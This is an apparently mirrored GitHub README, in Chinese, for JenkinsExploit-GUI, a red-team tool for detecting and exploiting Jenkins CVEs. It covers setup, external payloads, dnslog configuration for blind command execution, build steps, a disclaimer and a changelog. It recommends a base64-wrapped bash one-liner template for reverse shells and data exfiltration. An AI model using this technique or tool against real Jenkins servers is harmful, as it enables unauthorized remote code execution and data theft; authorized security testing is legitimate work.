TheBeastofwar / JenkinsExploit-GUI

一款Jenkins的综合漏洞利用工具

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

JenkinsExploit-GUI

JenkinsExploit-GUI

一款Jenkins综合漏洞利用工具

使用

jdk版本

在windows或linux使用jdk8的哪一个版本应该都可以,在macOS里如果出现了找不到主类的错误,可能是因为当前java版本没有jfxrt.jar包,可以把这个jar包放在类似F:\java8\jdk1.8.0_102\jre\lib\ext这样的目录下 jfxrt.jar包在JenkinsExploit-GUI项目源码中可以单独下载下来

外置payload

从release下载windows_tools,linux_tools或macOS_tools并放在与JenkinsExploit-GUI-*-SNAPSHOT.jar相同的目录,或者可以自行打包tools_source中的python源码文件

如果是linux或macOS的话需要对外置payload进行chmod +x 赋予权限 img.png img_1.png

dnslog配置

进行dnslog设置,目前仅支持dnslog.pw和ceye.io

img_3.png img_4.png

进行检测

img_2.png

  • 在验证无回显命令执行的时候为了避免转义问题,推荐用如下方式进行反弹shell和dnslog外带信息
bash -c {echo,Y....}|{base64,-d}|{bash,-i}

支持检测:

未完待续:

  • CVE-2016-9299 Jenkins ldap反序列化远程代码执行,添加poc
  • CVE-2017-1000353 无法检测的bug
  • 继续尝试把外置的payload接入到java代码中
  • 添加批量检测功能

源码打包

mvn clean package -DskipTests
cd target
zip -d  JenkinsExploit-GUI-*-SNAPSHOT.jar 'META-INF/*.SF' 'META-INF/*.RSA' 'META-INF/*DSA'

Bug反馈

https://github.com/thebeastofwar/JenkinsExploit-GUI 提交issues

文章

红队武器化开发:jenkins综合漏洞利用工具----JenkinsExploit-GUI

免责声明

本工具仅面向合法授权的企业安全建设行为,如您需要测试本工具的可用性,请自行搭建靶机环境。 在使用本工具进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权。请勿对非授权目标进行扫描。 如您在使用本工具的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任。 在安装并使用本工具前,请您务必审慎阅读、充分理解各条款内容,限制、免责条款或者其他涉及您重大权益的条款可能会以加粗、加下划线等形式提示您重点注意。 除非您已充分阅读、完全理解并接受本协议所有条款,否则,请您不要安装并使用本工具。您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的,即视为您已阅读并同意本协议的约束。

开发日志

v1.0

  • 以yhy0师傅的模板项目 https://github.com/yhy0/ExpDemo-JavaFX 为模板,写出了jenkins综合漏洞利用工具
  • 部分python的poc还未转成java代码接入到工具中,就打包成可执行文件

v1.1

  • 添加Jenkins指纹验证和版本获取功能,使得能够通过版本先匹配一下CVE
  • 修复进行all检测后还得再次对特定的CVE进行检测的bug(经过版本检测后直接转到对应的CVE检测)

v1.2

  • 可以配置dnslog.pw或ceye.io dnslog平台来进行自动化无回显命令执行或SSRF验证

v1.3

  • 测试在macOS上的运行情况

Stargazers over time

Stargazers over time

About

一款Jenkins的综合漏洞利用工具


Languages

Language:Java 99.1%Language:CSS 0.9%